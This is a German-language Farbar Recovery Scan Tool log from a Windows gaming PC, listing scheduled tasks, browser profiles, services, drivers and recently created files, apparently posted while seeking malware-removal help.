Task: {5E67C348-32A2-4F6B-8445-AADDCD518B82} - System32\Tasks\MicrosoftEdgeShadowStackRollbackTask => C:\Program Files (x86)\Microsoft\Edge\Application\102.0.1245.44\Installer\setup.exe [3256224 2022-06-20] (Microsoft Corporation -> Microsoft Corporation) 
Task: {6F5AFCD5-F325-406B-8963-D0E7AA36B741} - System32\Tasks\Opera scheduled assistant Autoupdate 1652464039 => C:\Users\Pauli\AppData\Local\Programs\Opera\launcher.exe -> --scheduledautoupdate --component-name=assistant --component-path="C:\Users\Pauli\AppData\Local\Programs\Opera\assistant" $(Arg0) 
Task: {701147DD-9D64-4887-A971-170DF64FED01} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\MpCmdRun.exe [993000 2022-04-08] (Microsoft Windows Publisher -> Microsoft Corporation) 
Task: {737CA134-BE9D-4DD1-80A3-888B8225C1EA} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\MpCmdRun.exe [993000 2022-04-08] (Microsoft Windows Publisher -> Microsoft Corporation) 
Task: {7EC00491-E7BD-4994-B089-D743E1A8B74D} - System32\Tasks\ASUS\NoiseCancelingEngine => C:\Program Files (x86)\ASUS\ArmouryDevice\dll\MBLedSDK\NoiseCancelingEngine.exe [1241960 2021-11-24] (ASUSTeK Computer Inc. -> ASUS) 
Task: {822F3FA1-B1B0-4A53-8CA5-2F69C2230A19} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-05-20] (Nvidia Corporation -> NVIDIA Corporation) 
Task: {85CD0405-93B5-4BBD-B6B7-53C1EDBD6EE8} - System32\Tasks\Microsoft\Windows\Clip\LicenseImdsIntegration => C:\Windows\system32\fclip.exe [480720 2022-06-17] (Microsoft Windows Publisher -> Microsoft Corporation) 
Task: {86969224-86CB-43A9-BA0B-076322AF9A33} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [646344 2022-05-20] (Nvidia Corporation -> NVIDIA Corporation) 
Task: {906980F4-8A9F-4D28-A235-263827E4E846} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [906752 2022-05-20] (Nvidia Corporation -> NVIDIA Corporation) 
Task: {91AC97F0-4E7D-43EE-B738-817FF73D2F6D} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [1003128 2022-05-20] (Nvidia Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log 
Task: {AB8BF43F-3023-49DD-97A4-9F29C36D1CE5} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3342080 2022-05-20] (Nvidia Corporation -> NVIDIA Corporation) 
Task: {B3B430B3-2568-4730-AEEA-B1052DB2522F} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [906752 2022-05-20] (Nvidia Corporation -> NVIDIA Corporation) 
Task: {BA3ED9CB-81C6-414E-958A-B3E7AA529CA8} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-05-20] (Nvidia Corporation -> NVIDIA Corporation) 
Task: {CC0A7A45-1E31-4823-951C-BE34A4B6753F} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\MpCmdRun.exe [993000 2022-04-08] (Microsoft Windows Publisher -> Microsoft Corporation) 
Task: {D1529CF3-305B-4714-AD86-332CDEB88597} - System32\Tasks\ASUS\Framework Service => C:\Program Files (x86)\ASUS\ArmouryDevice\asus_framework.exe [43022856 2022-01-11] (ASUSTeK COMPUTER INC. -> ASUSTek Computer Inc.) 
Task: {DB575289-EE17-4F83-A5D1-325A884A25F8} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-05-20] (Nvidia Corporation -> NVIDIA Corporation) 
Task: {DC0B7859-04E0-4352-A99B-0907AB0EF465} - System32\Tasks\ASUS\ASUSUpdateTaskMachineUA => C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe [158224 2022-04-08] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) 
Task: {DD76535E-14DA-47AA-8E46-34A19F073241} - System32\Tasks\ASUS\ASUSUpdateTaskMachineCore1d84b6ef7c35684 => C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe [158224 2022-04-08] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) 
Task: {F29D09A4-7E44-42AD-AB09-5769D048AB80} - System32\Tasks\ASUS\P508PowerAgent_sdk => C:\Program Files (x86)\ASUS\ArmouryDevice\dll\ShareFromArmouryIII\Mouse\ROG STRIX CARRY\P508PowerAgent.exe (Keine Datei)   
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)     
==================== Internet (Nicht auf der Ausnahmeliste) ====================   
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)   
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254 
Tcpip\..\Interfaces\{89b7fff4-68ae-400c-b01c-cce359d50f18}: [DhcpNameServer] 192.168.1.254 
Tcpip\..\Interfaces\{a99b7a34-7b15-42d4-b39d-6c218b5a2543}: [DhcpNameServer] 192.168.1.254   
Edge:  
======= 
Edge DefaultProfile: Profile 1 
Edge Profile: C:\Users\Pauli\AppData\Local\Microsoft\Edge\User Data\Default [2022-06-19] 
Edge Profile: C:\Users\Pauli\AppData\Local\Microsoft\Edge\User Data\Profile 1 [2022-06-20] 
Edge HomePage: Profile 1 -> hxxp://www.google.de/ 
Edge StartupUrls: Profile 1 -> "hxxp://www.google.de/"   
Opera:  
======= 
OPR Profile: C:\Users\Pauli\AppData\Roaming\Opera Software\Opera Stable [2022-06-20] 
OPR DefaultSuggestURL: Opera Stable -> hxxps://www.google.com/complete/search?client=opera&q={searchTerms}&ie={inputEncoding}&oe={outputEncoding} 
OPR Extension: (Rich Hints Agent) - C:\Users\Pauli\AppData\Roaming\Opera Software\Opera Stable\Extensions\enegjkbbakeegngfapepobipndnebkdk [2022-05-13] 
OPR Extension: (Opera Crypto Wallet) - C:\Users\Pauli\AppData\Roaming\Opera Software\Opera Stable\Extensions\gojhcdgcpbpfigcaejpfhfegekdgiblk [2022-05-13] 
OPR Extension: (Amazon Assistant Promotion) - C:\Users\Pauli\AppData\Roaming\Opera Software\Opera Stable\Extensions\kbmoiomgmchbpihhdpabemajcbjpcijk [2022-05-13]   
==================== Dienste (Nicht auf der Ausnahmeliste) ===================   
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)   
R2 ArmouryCrateService; C:\Program Files\ASUS\ARMOURY CRATE Lite Service\ArmouryCrate.Service.exe [372456 2022-05-13] (ASUSTeK COMPUTER INC. -> ASUSTeK COMPUTER INC.) 
S3 ArmouryLiveUpdate; C:\Windows\System32\DriverStore\FileRepository\rogms.inf_amd64_1d3b9add1418e6f7\ArmouryLiveUpdate.exe [577280 2022-05-17] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) 
R2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\4.02.12\atkexComSvc.exe [457544 2022-02-10] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) 
S2 asus; C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe [158224 2022-04-08] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) 
R2 AsusCertService; C:\Program Files (x86)\ASUS\AsusCertService\AsusCertService.exe [181576 2022-03-09] (ASUSTeK Computer Inc. -> ASUSTek COMPUTER INC.) 
R2 AsusFanControlService; C:\Program Files (x86)\ASUS\AsusFanControlService\2.01.13\AsusFanControlService.exe [2216264 2022-03-09] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) 
S3 asusm; C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe [158224 2022-04-08] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) 
R2 AsusUpdateCheck; C:\Windows\System32\AsusUpdateCheck.exe [1164992 2022-06-20] (ASUSTeK Computer Inc. -> ) 
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [8885112 2022-05-17] (BattlEye Innovations e.K. -> ) 
R2 CC-Updater; C:\Windows\cc\WinCtlSvc.exe [7518088 2022-05-24] (Salfeld Computer GmbH -> Salfeld Computer) 
R2 CorsairGamingAudioConfig; C:\Windows\System32\CorsairGamingAudioCfgService64.exe [661016 2022-03-01] (Microsoft Windows Hardware Compatibility Publisher -> Corsair Memory, Inc.) 
R2 CorsairLLAService; C:\Program Files\Corsair\CORSAIR iCUE 4 Software\CueLLAccessService.exe [230504 2022-03-17] (Corsair Memory, Inc. -> Corsair Memory, Inc.) 
R2 CorsairService; C:\Program Files\Corsair\CORSAIR iCUE 4 Software\Corsair.Service.exe [81512 2022-03-17] (Corsair Memory, Inc. -> Corsair Memory, Inc.) 
R2 DtsApo4Service; C:\Windows\System32\DTS\PC\APO4x\DtsApo4Service.exe [224680 2021-09-22] (DTS, Inc. -> DTS Inc.) 
R2 EABackgroundService; C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe [10932944 2022-06-14] (Electronic Arts, Inc. -> Electronic Arts) 
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [1135648 2022-05-16] (EasyAntiCheat Oy -> Epic Games, Inc) 
S3 EasyAntiCheat_EOS; C:\Program Files (x86)\EasyAntiCheat_EOS\EasyAntiCheat_EOS.exe [584680 2022-05-01] (EasyAntiCheat Oy -> Epic Games, Inc.) 
S3 EpicOnlineServices; C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe [934368 2022-03-03] (Epic Games Inc. -> Epic Games, Inc.) 
S2 GameInput Service; C:\Program Files (x86)\Microsoft GameInput\x64\gameinputsvc.exe [75240 2022-05-25] (Microsoft Corporation -> Microsoft Corporation) 
R2 GameSDK Service; C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe [397544 2022-05-31] (ASUSTeK COMPUTER INC. -> ASUS Inc.) 
R3 iCUEDevicePluginHost; C:\Program Files\Corsair\CORSAIR iCUE 4 Software\iCUEDevicePluginHost.exe [440936 2022-03-17] (Corsair Memory, Inc. -> Corsair) 
R2 LGHUBUpdaterService; C:\Program Files\LGHUB\lghub_updater.exe [11523704 2022-06-11] (Logitech Inc -> Logitech, Inc.) 
R2 LightingService; C:\Program Files (x86)\LightingService\LightingService.exe [3835360 2022-03-10] (ASUSTeK COMPUTER INC. -> ASUSTek Computer Inc.) 
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2575624 2022-05-27] (Electronic Arts, Inc. -> Electronic Arts) 
R2 Origin Web Helper Service; C:\Program Files (x86)\Origin\OriginWebHelperService.exe [3494672 2022-05-27] (Electronic Arts, Inc. -> Electronic Arts) 
S3 Rockstar Service; C:\Program Files\Rockstar Games\Launcher\RockstarService.exe [1908688 2022-06-16] (Rockstar Games, Inc. -> Rockstar Games) 
R2 ROG Live Service; C:\Program Files (x86)\ASUS\ROG Live Service\ROGLiveService.exe [6304488 2022-04-25] (ASUSTeK COMPUTER INC. -> ASUSTek COMPUTER INC.) 
R2 SCC-Dienst; C:\Windows\cc\ctlsysmgr.exe [7835528 2022-05-24] (Salfeld Computer GmbH -> Salfeld Computer) 
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [6207704 2022-06-17] (Microsoft Windows Publisher -> Microsoft Corporation) 
S3 ucldr_Crowz_ST; C:\Program Files\Common Files\Wellbia.com\ucldr_Crowz_ST.exe [5534960 2022-06-05] (Wellbia.com Co., Ltd. -> Wellbia.com Co., Ltd.) 
S2 upccsvc; C:\Windows\upcc\upccsvc.exe [1683616 2019-02-06] (Salfeld Computer GmbH -> Salfeld GmbH) 
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\NisSrv.exe [3116848 2022-04-08] (Microsoft Windows Publisher -> Microsoft Corporation) 
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\MsMpEng.exe [133544 2022-04-08] (Microsoft Windows Publisher -> Microsoft Corporation) 
R2 WMIRegistrationService; C:\Windows\System32\DriverStore\FileRepository\mewmiprov.inf_amd64_cad1db73e8c782a6\WMIRegistrationService.exe [538736 2021-11-30] (Intel Corporation -> Intel Corporation) 
R2 NVDisplay.ContainerLocalSystem; C:\Windows\System32\DriverStore\FileRepository\nv_dispig.inf_amd64_647b4244e991951b\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVIDIA\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\Windows\System32\DriverStore\FileRepository\nv_dispig.inf_amd64_647b4244e991951b\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem   
===================== Treiber (Nicht auf der Ausnahmeliste) ===================   
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)   
S3 AcxHdAudio; C:\Windows\System32\drivers\AcxHdAudio.sys [557056 2022-06-17] (Microsoft Windows -> Microsoft Corporation) 
S3 AppleLowerFilter; C:\Windows\System32\drivers\AppleLowerFilter.sys [35976 2020-10-09] (WDKTestCert build,132303256403278908 -> Apple Inc.) 
R1 Asusgio2; C:\Windows\system32\drivers\AsIO2.sys [34384 2022-02-10] (ASUSTeK Computer Inc. -> ) 
R1 Asusgio3; C:\Windows\system32\drivers\AsIO3.sys [43168 2022-03-09] (ASUSTeK Computer Inc. -> ) 
S3 BthA2dp; C:\Windows\System32\drivers\BthA2dp.sys [507904 2021-11-04] (Microsoft Corporation) [Datei ist nicht signiert] 
S3 BthHFEnum; C:\Windows\System32\drivers\bthhfenum.sys [180224 2021-11-04] (Microsoft Corporation) [Datei ist nicht signiert] 
S3 BTHMODEM; C:\Windows\System32\drivers\bthmodem.sys [98304 2021-06-05] (Microsoft Corporation) [Datei ist nicht signiert] 
S3 CorsairGamingAudioService; C:\Windows\System32\drivers\CorsairGamingAudio64.sys [61976 2022-03-01] (Microsoft Windows Hardware Compatibility Publisher -> Corsair Memory, Inc.) 
R2 CorsairLLAccessC2D033F14715AA7325305EA42FBFC65BF867CC1D; C:\Program Files\Corsair\CORSAIR iCUE 4 Software\CorsairLLAccess64.sys [21752 2022-01-31] (Microsoft Windows Hardware Compatibility Publisher -> Corsair Memory, Inc.) 
R3 CorsairVBusDriver; C:\Windows\System32\drivers\CorsairVBusDriver.sys [46600 2022-01-31] (Microsoft Windows Hardware Compatibility Publisher -> Corsair) 
R3 CorsairVHidDriver; C:\Windows\System32\drivers\CorsairVHidDriver.sys [22536 2022-01-31] (Microsoft Windows Hardware Compatibility Publisher -> Corsair) 
R3 cpuz153; C:\Windows\temp\cpuz153\cpuz153_x64.sys [36864 2022-06-20] (Microsoft Windows Hardware Compatibility Publisher -> CPUID) 
R1 CTIAIO; C:\Windows\system32\drivers\CtiAIo64.sys [32304 2022-06-20] (Microsoft Windows Hardware Compatibility Publisher -> Creative Technology Innovation Co., LTd.) 
S3 e2f68; C:\Windows\System32\drivers\e2f68.sys [485376 2021-06-01] (Microsoft Windows -> Intel Corporation) 
S3 Hsp; C:\Windows\System32\drivers\Hsp.sys [111960 2022-05-13] (Microsoft Windows -> Microsoft Corporation) 
R3 iaLPSS2_GPIO2_ADL; C:\Windows\System32\DriverStore\FileRepository\ialpss2_gpio2_adl.inf_amd64_e11257f05c0c2f89\iaLPSS2_GPIO2_ADL.sys [139928 2021-07-29] (Intel Corporation -> Intel Corporation) 
R3 iaLPSS2_I2C_ADL; C:\Windows\System32\DriverStore\FileRepository\ialpss2_i2c_adl.inf_amd64_778b19a5f4d49cba\iaLPSS2_I2C_ADL.sys [202896 2021-07-29] (Intel Corporation -> Intel Corporation) 
R0 iaStorVD; C:\Windows\System32\drivers\iaStorVD.sys [1587376 2021-10-19] (Intel Corporation -> Intel Corporation) 
R4 IOMap; C:\Windows\system32\drivers\IOMap64.sys [46728 2022-03-21] (ASUSTEK COMPUTER INC. -> ASUSTeK Computer Inc.) 
S3 logi_generic_hid_filter; C:\Windows\system32\drivers\logi_generic_hid_filter.sys [55624 2022-05-13] (Logitech Inc -> Logitech) 
R3 logi_joy_bus_enum; C:\Windows\system32\drivers\logi_joy_bus_enum.sys [33528 2022-04-29] (WDKTestCert builder,132743893872553407 -> Logitech) 
S3 logi_joy_hid_filter; C:\Windows\system32\drivers\logi_joy_hid_filter.sys [56656 2022-05-13] (Logitech Inc -> Logitech) 
S3 logi_joy_hid_lo; C:\Windows\system32\drivers\logi_joy_hid_lo.sys [41280 2022-04-29] (WDKTestCert builder,132743893872553407 -> Logitech) 
S3 logi_joy_vir_hid; C:\Windows\system32\drivers\logi_joy_vir_hid.sys [21704 2022-04-29] (WDKTestCert builder,132743893872553407 -> Logitech) 
R3 logi_joy_xlcore; C:\Windows\system32\drivers\logi_joy_xlcore.sys [62904 2022-04-29] (WDKTestCert builder,132743893872553407 -> Logitech) 
R1 MSIO; C:\Windows\system32\drivers\MsIo64.sys [17424 2020-01-19] (Microsoft Windows Hardware Compatibility Publisher -> MICSYS Technology Co., LTd) 
R1 netfltcc; C:\Windows\System32\drivers\netfltcc.sys [95752 2019-08-21] (Microsoft Windows Hardware Compatibility Publisher -> Windows (R) Win 7 DDK provider) 
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [48552 2021-11-01] (Microsoft Windows Hardware Compatibility Publisher -> NVIDIA Corporation) 
R3 ROGKB; C:\Windows\System32\DriverStore\FileRepository\rogkb.inf_amd64_7b02b00ea166ec76\ROGKB.sys [38056 2022-05-17] (ASUSTeK COMPUTER INC. -> Windows (R) Win 7 DDK provider) 
R3 ROGMS; C:\Windows\System32\DriverStore\FileRepository\rogms.inf_amd64_1d3b9add1418e6f7\ROGMS.sys [37544 2022-05-17] (ASUSTeK COMPUTER INC. -> Windows (R) Win 7 DDK provider) 
S0 WdBoot; C:\Windows\System32\drivers\wd\WdBoot.sys [49600 2022-04-08] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation) 
R0 WdFilter; C:\Windows\System32\drivers\wd\WdFilter.sys [443664 2022-04-08] (Microsoft Windows -> Microsoft Corporation) 
R3 WdNisDrv; C:\Windows\System32\drivers\wd\WdNisDrv.sys [90384 2022-04-08] (Microsoft Windows -> Microsoft Corporation) 
S3 xhunter1; C:\Windows\xhunter1.sys [1431256 2022-06-05] (Wellbia.com Co., Ltd. -> Wellbia.com Co., Ltd.)   
==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================   
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)     
==================== Ein Monat (erstellte) (Nicht auf der Ausnahmeliste) =========   
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)   
2022-06-20 17:29 - 2022-06-20 17:29 - 000000008 __RSH C:\ProgramData\ntuser.pol 
2022-06-20 17:28 - 2022-06-20 17:28 - 000040163 _____ C:\Users\Pauli\Desktop\Fixlog.txt 
2022-06-20 17:26 - 2022-06-20 17:26 - 000000000 _____ C:\Users\Pauli\Desktop\Textdokument (neu) (2).txt 
2022-06-20 17:11 - 2022-06-20 17:11 - 000000000 ____D C:\Users\Pauli\AppData\Local\ArmouryLiveUpdate 
2022-06-20 10:58 - 2022-06-20 10:58 - 000001466 _____ C:\Users\Pauli\Desktop\AdwCleaner[S01].txt 
2022-06-20 10:57 - 2022-06-20 10:57 - 000001422 _____ C:\Users\Pauli\Desktop\malwarebytes_scanbericht.txt 
2022-06-20 10:51 - 2022-06-20 10:51 - 002549096 _____ (Malwarebytes) C:\Users\Pauli\Downloads\MBSetup.exe 
2022-06-20 10:07 - 2022-06-20 10:11 - 000002030 _____ C:\Users\Pauli\Desktop\Textdokument (neu).txt 
2022-06-20 09:45 - 2022-06-20 09:45 - 000000000 ___HD C:\$WinREAgent 
2022-06-20 09:41 - 2022-06-20 17:31 - 000030855 _____ C:\Users\Pauli\Desktop\FRST.txt 
2022-06-20 09:41 - 2022-06-20 09:42 - 000070650 _____ C:\Users\Pauli\Desktop\Addition.txt 
2022-06-20 09:40 - 2022-06-20 17:30 - 000000000 ____D C:\FRST 
2022-06-20 09:39 - 2022-06-20 09:40 - 002369024 _____ (Farbar) C:\Users\Pauli\Desktop\FRST64.exe 
2022-06-19 21:42 - 2022-06-19 21:42 - 000001164 _____ C:\Users\Pauli\Desktop\Microsoft Flight Simulator.lnk 
2022-06-18 21:34 - 2022-06-18 21:34 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\HelloGames 
2022-06-18 18:36 - 2022-06-18 18:36 - 000000223 _____ C:\Users\Pauli\Desktop\Days Gone.url 
2022-06-17 14:01 - 2022-06-17 14:01 - 000614400 _____ C:\Windows\system32\TextInputMethodFormatter.dll 
2022-06-17 14:01 - 2022-06-17 14:01 - 000557056 _____ (Microsoft Corporation) C:\Windows\system32\PhotoScreensaver.scr 
2022-06-17 14:01 - 2022-06-17 14:01 - 000524288 _____ C:\Windows\system32\AssignedAccessCsp.dll 
2022-06-17 14:01 - 2022-06-17 14:01 - 000485376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PhotoScreensaver.scr 
2022-06-17 14:01 - 2022-06-17 14:01 - 000335872 _____ C:\Windows\system32\Windows.Management.InprocObjects.dll 
2022-06-17 14:01 - 2022-06-17 14:01 - 000299008 _____ C:\Windows\system32\EsclScan.dll 
2022-06-17 14:01 - 2022-06-17 14:01 - 000180224 _____ C:\Windows\system32\EsclProtocol.dll 
2022-06-17 14:01 - 2022-06-17 14:01 - 000167936 _____ C:\Windows\system32\DeviceUpdateCenterCsp.dll 
2022-06-17 14:01 - 2022-06-17 14:01 - 000057344 _____ C:\Windows\system32\uwfservicingapi.dll 
2022-06-17 14:01 - 2022-06-17 14:01 - 000015042 _____ C:\Windows\system32\DrtmAuthTxt.wim 
2022-06-16 10:33 - 2022-06-16 10:33 - 000000000 ____D C:\Users\Pauli\AppData\LocalLow\Landfall 
2022-06-13 16:25 - 2022-06-14 14:01 - 000000000 ____D C:\Users\Pauli\AppData\Local\Fallout4 MS 
2022-06-12 18:11 - 2022-06-12 18:11 - 000001911 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Setup.lnk 
2022-06-12 18:11 - 2022-06-12 18:11 - 000000000 ____D C:\Windows\ShellServiceLog 
2022-06-12 14:41 - 2022-06-12 14:41 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Logi 
2022-06-12 14:41 - 2022-06-12 14:41 - 000000000 ____D C:\Program Files\LGHUB 
2022-06-11 20:24 - 2022-06-11 20:24 - 000000000 ____D C:\Users\Pauli\AppData\Local\ReadyOrNot 
2022-06-11 20:11 - 2022-06-11 20:11 - 000000223 _____ C:\Users\Pauli\Desktop\Ready or Not.url 
2022-06-10 12:57 - 2022-06-10 12:57 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\IO Interactive 
2022-06-09 19:35 - 2022-06-09 19:35 - 000000000 ____D C:\Program Files (x86)\Windows Kits 
2022-06-09 19:35 - 2022-06-09 19:35 - 000000000 ____D C:\Program Files (x86)\Microsoft GameInput 
2022-06-06 20:49 - 2022-06-06 20:49 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Kindersicherung 
2022-06-06 20:09 - 2022-06-06 20:10 - 000000000 ____D C:\ProgramData\HitmanPro 
2022-06-06 20:09 - 2022-06-06 20:09 - 000000000 ____D C:\Program Files\HitmanPro 
2022-06-06 19:58 - 2022-06-10 18:08 - 000001244 _____ C:\Users\Pauli\Desktop\Roblox Studio.lnk 
2022-06-06 18:10 - 2022-06-06 18:10 - 000000000 ____D C:\Users\Pauli\AppData\Local\IO Interactive 
2022-06-06 15:24 - 2022-06-06 15:24 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\EasyAntiCheat 
2022-06-05 16:47 - 2022-06-10 18:08 - 000001421 _____ C:\Users\Pauli\Desktop\Roblox Player.lnk 
2022-06-05 16:47 - 2022-06-10 18:08 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Roblox 
2022-06-05 16:47 - 2022-06-05 22:19 - 000000000 ____D C:\Users\Pauli\AppData\Local\Roblox 
2022-06-05 16:47 - 2022-06-05 22:16 - 000000256 _____ C:\Users\Pauli\AppData\LocalLow\rbxcsettings.rbx 
2022-06-05 15:22 - 2022-06-05 15:22 - 000000000 ____D C:\Program Files\Common Files\Wellbia.com 
2022-06-04 15:54 - 2022-06-04 22:32 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\discord 
2022-06-04 15:54 - 2022-06-04 22:19 - 000000000 ____D C:\Users\Pauli\AppData\Local\Discord 
2022-06-04 15:54 - 2022-06-04 15:54 - 000002227 _____ C:\Users\Pauli\Desktop\Discord.lnk 
2022-06-04 15:54 - 2022-06-04 15:54 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord Inc 
2022-06-04 15:49 - 2022-06-04 15:50 - 000000000 ____D C:\_backup 
2022-06-02 19:32 - 2022-06-02 19:33 - 000000000 ____D C:\ProgramData\EA Logs 
2022-06-02 19:32 - 2022-06-02 19:32 - 000000000 ____D C:\ProgramData\PopCap Games 
2022-06-02 19:32 - 2022-06-02 19:32 - 000000000 ____D C:\ProgramData\EA Core 
2022-05-31 19:52 - 2022-05-31 19:52 - 000000000 ____D C:\Users\Pauli\AppData\LocalLow\Curve Digital 
2022-05-31 19:31 - 2022-06-08 17:39 - 000000000 ____D C:\Users\Pauli\AppData\Local\Ubisoft Game Launcher 
2022-05-31 19:31 - 2022-05-31 19:31 - 000001323 _____ C:\Users\Pauli\Desktop\Ubisoft Connect.lnk 
2022-05-31 19:31 - 2022-05-31 19:31 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft 
2022-05-31 19:31 - 2022-05-31 19:31 - 000000000 ____D C:\ProgramData\Ubisoft 
2022-05-31 19:30 - 2022-05-31 19:30 - 000000000 ____D C:\Program Files (x86)\Ubisoft 
2022-05-31 19:15 - 2022-06-06 20:44 - 000000085 _____ C:\Windows\wininit.ini 
2022-05-31 18:35 - 2022-05-31 18:35 - 000000000 ____D C:\Windows\system32\Tasks\Safer-Networking 
2022-05-31 18:34 - 2022-06-06 20:48 - 000000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2 
2022-05-31 18:34 - 2022-06-06 20:44 - 000000000 ____D C:\ProgramData\Spybot - Search & Destroy 
2022-05-31 18:34 - 2022-05-31 18:34 - 000000000 ____D C:\Users\Pauli\AppData\Local\BraveSoftware 
2022-05-31 18:34 - 2022-05-31 18:34 - 000000000 ____D C:\Program Files (x86)\BraveSoftware 
2022-05-31 18:22 - 2022-05-31 18:22 - 000000000 ____D C:\Users\Pauli\AppData\Local\mbam 
2022-05-30 19:25 - 2022-06-19 21:32 - 000000000 ____D C:\Users\Pauli\AppData\LocalLow\Ninja Kiwi 
2022-05-30 17:00 - 2022-05-30 17:00 - 000000000 ____D C:\Users\Pauli\AppData\Local\GSS2 
2022-05-29 17:51 - 2022-05-29 17:52 - 000000000 ____D C:\Users\Pauli\AppData\Local\Sniper Elite 5 
2022-05-29 16:59 - 2022-05-21 05:26 - 001905912 _____ C:\Windows\system32\vulkaninfo-1-999-0-0-0.exe 
2022-05-29 16:59 - 2022-05-21 05:26 - 001905912 _____ C:\Windows\system32\vulkaninfo.exe 
2022-05-29 16:59 - 2022-05-21 05:26 - 001478384 _____ C:\Windows\SysWOW64\vulkaninfo-1-999-0-0-0.exe 
2022-05-29 16:59 - 2022-05-21 05:26 - 001478384 _____ C:\Windows\SysWOW64\vulkaninfo.exe 
2022-05-29 16:59 - 2022-05-21 05:26 - 001467080 _____ (Khronos Group) C:\Windows\system32\OpenCL.dll 
2022-05-29 16:59 - 2022-05-21 05:26 - 001432304 _____ C:\Windows\system32\vulkan-1-999-0-0-0.dll 
2022-05-29 16:59 - 2022-05-21 05:26 - 001432304 _____ C:\Windows\system32\vulkan-1.dll 
